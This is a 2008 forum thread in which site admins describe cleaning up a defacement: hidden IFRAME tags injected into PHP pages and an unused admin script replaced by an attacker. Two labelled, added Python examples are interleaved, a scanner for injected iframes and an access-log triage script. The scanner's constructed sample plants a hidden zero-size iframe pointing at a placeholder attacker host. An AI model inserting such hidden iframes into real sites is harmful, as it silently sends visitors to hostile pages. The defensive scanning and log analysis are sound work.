LITTLEBLACKDOG.COM
Slymer
Tail-Wagger


Joined: 29 May 2003 Age: 30 Posts: 2188
Location: chair in front of my computer
Posted: Sun Jan 06, 2008 2:38 pm    Post subject: LWD malwared?
Anyone else having issues with LWD redirecting to a TON (I can't count it 'cause it locks up the CPU at 100% usage in Firefox/IE/AFB (any f'n browser) and never finishes loading) of redirects... mainly to some .ar domain?
My DNS is clean... just checked... everything that I have redirects for is mainly the Spybot S&D redirect to localhost for the bad domains list and localhost. Looks like LWD may have been the victim of SQL injection or some such nonsense (since I'm not versed on attack stuffs... I dunno what exactly to call it).
_________________
The Sly One
======================================
Windows is like crack. It feels good, it's easy to start into, it hooks you bad, it costs a ton of money, and it makes you crazy. And you still love it. - EdisonRex
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. -- Albert Einstein
EdisonRex
Lead Dog


Joined: 06 May 2002 Posts: 10046
Location: Not Moscow
Posted: Sun Jan 06, 2008 3:39 pm
Code injection on the root directory. Kind of primitive. I fixed the PHP code (basically they added 3 IFRAME tags to some Argentina site). Downloading logs to figure out who dunnit and how, so we can lock the open window.
Also banned some guy playing comment games from Cap Gemini India.
I SHOULD report the bastard, but probably not worth it.
_________________
Garret: It's so retro.
EGM: What does retro mean to you?
Parker: Like, old and outdated.
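The fix described in the post above (finding and removing IFRAME tags dropped into the site's PHP files) is the kind of thing you want a repeatable check for, so the tampering is caught the next time rather than noticed from a browser locking up. The scanner below is an added example, not code from this thread or from LWD: it walks a web root, parses every PHP/HTML file, and reports any iframe whose src host is not on an allow-list of hosts the site actually uses, noting whether the tag was sized or styled to be invisible. The sample files, the hostnames and the allow-list are constructed for the demonstration.

```python
"""Scan a web root for injected <iframe> tags pointing at hosts the site
does not own.  Added example, not the thread's own tooling; the sample
files, hostnames and allow-list below are constructed."""
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Style fragments that usually mean the frame was meant to be invisible.
HIDDEN_HINTS = ("display:none", "visibility:hidden")


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes and line number."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            line, _ = self.getpos()
            self.iframes.append((line, {k.lower(): (v or "") for k, v in attrs}))


def looks_hidden(attrs):
    """True if the iframe is styled invisible or sized to 0/1 pixels."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(hint in style for hint in HIDDEN_HINTS):
        return True
    tiny = ("0", "1")
    return attrs.get("width", "").strip() in tiny or attrs.get("height", "").strip() in tiny


def find_injected_iframes(root, allowed_hosts):
    """Walk `root` and return a finding for each iframe whose src host is not allowed.

    Relative src values (same-site frames) have no host and are not reported."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".html", ".htm", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            collector = IframeCollector()
            collector.feed(text)
            for line, attrs in collector.iframes:
                src = attrs.get("src", "")
                host = urlparse(src).hostname or ""
                if host and host not in allowed_hosts:
                    findings.append({
                        "file": os.path.relpath(path, root),
                        "line": line,
                        "src": src,
                        "hidden": looks_hidden(attrs),
                    })
    return findings


def make_sample_site():
    """Create a throwaway web root: one clean page and one tampered PHP file (constructed)."""
    root = tempfile.mkdtemp(prefix="iframe-scan-")
    clean = ('<html><body><iframe src="http://www.example-site.test/cam" width="320">'
             '</iframe></body></html>\n')
    tampered = (
        "<?php include('config.php'); ?>\n"
        "<html><body>\n"
        '<iframe src="http://attacker-placeholder.test/x.php" width=0 height=0 '
        'style="display:none"></iframe>\n'
        "<p>Welcome</p>\n"
        "</body></html>\n"
    )
    with open(os.path.join(root, "about.html"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(tampered)
    return root


if __name__ == "__main__":
    site = make_sample_site()
    for hit in find_injected_iframes(site, {"www.example-site.test"}):
        flag = "HIDDEN " if hit["hidden"] else ""
        print(f'{hit["file"]}:{hit["line"]}: {flag}iframe -> {hit["src"]}')
```

Run it against the real document root (with the allow-list filled in from the site's own embeds, such as the webcam host) from cron or after each deploy, and diff the output against the previous run; a clean site should produce an empty list, so any new line is worth a look before users report redirects.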
EdisonRex
Lead Dog


Joined: 06 May 2002 Posts: 10046
Location: Not Moscow
Posted: Mon Jan 07, 2008 4:35 am
I got a call (at work) from Lunarpages today regarding this. Apparently the 45 core dumps I saw in LWD's public_html directory had made some folks at Lunarpages notice, and they disabled a script over there. Funny as it's a script we don't use, and it's zero bytes since 2004 anyway, so it's something Fido already commented out. Which could be bad anyway.
Upshot is, Lunarpages opened a ticket on this. After some back and forth, I apparently now have got the ticket escalated to their technical staff "for review". In any case, the site is working, for the time being, and I'm paying attention to it. Which may mean you'll get more news there. The whole episode has made me start thinking about LWD again.
_________________
Garret: It's so retro.
EGM: What does retro mean to you?
Parker: Like, old and outdated.
fathertyme
Site Admin


Joined: 30 Jun 2001 Posts: 6178
Location: The American Colonies
Posted: Mon Jan 07, 2008 12:38 pm
That means I can stop scouring the log files looking for anything suspicious?!?!?
_________________
LWD web-cams: http://lwdcam.codecoma.com/?lwdcam
----
---
[9:08pm][09/16/2005]«+ flip » college...what is that
[9:08pm][09/16/2005]«+ Aff » apparently a place where you find rum
---
I used to live in my own little world, but they didn't like me there either.
You see dead people? I'm a software engineer, I don't see anybody!
---
My Amazon Wishlist
EdisonRex
Lead Dog


Joined: 06 May 2002 Posts: 10046
Location: Not Moscow
Posted: Mon Jan 07, 2008 1:36 pm
Go back to sleep, Tyme. It was the phpBB code we don't use over there that got us cracked. I deleted it, we don't use it and never will now.
Same hack that got us here, actually.
_________________
Garret: It's so retro.
EGM: What does retro mean to you?
Parker: Like, old and outdated.
EdisonRex
Lead Dog


Joined: 06 May 2002 Posts: 10046
Location: Not Moscow
Posted: Mon Jan 07, 2008 1:49 pm
So yeah, we got hacked by a piece of code we don't use, and had shut off via modules.php, which has been turning away legions of Russian hackers trying to substitute our phpNuke working area with theirs, and then some dink from Germany pops in, goes straight to our admin_db_utilities.php and replaces it. Within minutes, at least 8 others show up to try the same thing. One thing the script kiddies do is, they've got a network.
Truth be told, they were pretty good to us. They were more cruel to the server, which was why Lunarpages got interested this time. They crashed the server a bunch of times on Saturday, which got traced to the now-screwed admin_db_utilities.php file, and then Lunarpages locked it. I've told them to leave it locked for now.
I also cleaned out another 250 comment spams left in the polls. I checked our referrer list; it doesn't seem to be cross-linking too much porn content, so I think we'll come out of it, but I'm just getting sick of this. After getting hit with about 13,000 script-generated spam links in our comment database I'm pretty much ready to extract the data out myself and make static pages.
_________________
Garret: It's so retro.
EGM: What does retro mean to you?
Parker: Like, old and outdated.
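The sequence described above (one client goes straight to admin_db_utilities.php and replaces it, then several more arrive within minutes to try the same) is exactly what an access-log triage should surface: every client that touched the unused admin script, when it first appeared, whether it POSTed, whether it sent a referrer, and whether the server answered 2xx or, once the file was locked, 403. The script below is an added example, not the tooling EdisonRex or Lunarpages used: it parses Apache combined-format log lines, groups hits on a watched script by client address, and flags the ones that succeeded. The log lines are constructed with TEST-NET addresses and placeholder user agents; the watched-script name is the one the thread mentions.

```python
"""Triage an Apache combined-format access log for hits on an admin script
the site never uses.  Added example, not the thread's own tooling; the log
lines are constructed (TEST-NET addresses, placeholder user agents)."""
import re
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The thread names this script as unused on the site; any hit on it is of interest.
WATCHED = {"/admin_db_utilities.php"}

# Constructed sample: normal browsing, one client that reaches the admin
# script and gets 200s, and a later client refused with 403 after the lock.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jan/2008:22:01:13 -0800] "GET /index.php HTTP/1.1" 200 5120 "http://www.example-forum.test/" "Mozilla/5.0"
198.51.100.7 - - [05/Jan/2008:22:04:02 -0800] "GET /admin_db_utilities.php HTTP/1.1" 200 812 "-" "Mozilla/4.0"
198.51.100.7 - - [05/Jan/2008:22:04:09 -0800] "POST /admin_db_utilities.php HTTP/1.1" 200 219 "-" "Mozilla/4.0"
203.0.113.5 - - [05/Jan/2008:22:06:41 -0800] "GET /admin_db_utilities.php HTTP/1.1" 403 311 "-" "libwww-perl/5.805"
203.0.113.5 - - [05/Jan/2008:22:06:45 -0800] "POST /admin_db_utilities.php HTTP/1.1" 403 311 "-" "libwww-perl/5.805"
192.0.2.10 - - [05/Jan/2008:22:07:10 -0800] "GET /modules.php?name=News HTTP/1.1" 200 7401 "http://www.example-forum.test/" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["script"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def triage(log_text, watched=WATCHED):
    """Group hits on watched scripts by client IP.

    Each entry records first-seen time, total hits, POST count, requests with
    no referrer, 2xx responses, and the set of user agents used."""
    by_ip = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["script"] not in watched:
            continue
        entry = by_ip.setdefault(rec["ip"], {
            "first": rec["ts"], "hits": 0, "posts": 0,
            "no_referer": 0, "ok": 0, "ua": set(),
        })
        entry["first"] = min(entry["first"], rec["ts"])
        entry["hits"] += 1
        entry["posts"] += int(rec["method"] == "POST")
        entry["no_referer"] += int(rec["referer"] == "-")
        entry["ok"] += int(rec["status"].startswith("2"))
        entry["ua"].add(rec["ua"])
    return by_ip


def suspicious(by_ip):
    """Clients that POSTed to a watched script without a referrer and got a 2xx,
    ordered by first appearance (the earliest is the one to read the log around)."""
    flagged = [ip for ip, e in by_ip.items() if e["posts"] and e["no_referer"] and e["ok"]]
    return sorted(flagged, key=lambda ip: by_ip[ip]["first"])


if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    for ip, e in sorted(summary.items(), key=lambda kv: kv[1]["first"]):
        print(f'{ip}: first {e["first"]:%Y-%m-%d %H:%M:%S}, hits={e["hits"]}, '
              f'posts={e["posts"]}, 2xx={e["ok"]}, ua={sorted(e["ua"])}')
    print("suspicious:", suspicious(summary))
```

The earliest flagged address is the one whose surrounding log lines answer "how": a successful POST to a script nobody on the site uses, with no referrer, is the write that replaced the file, and everything from that client before it shows the path in. Clients that only ever received 403s arrived after the lock and are noise for the root-cause question, though still worth a firewall rule.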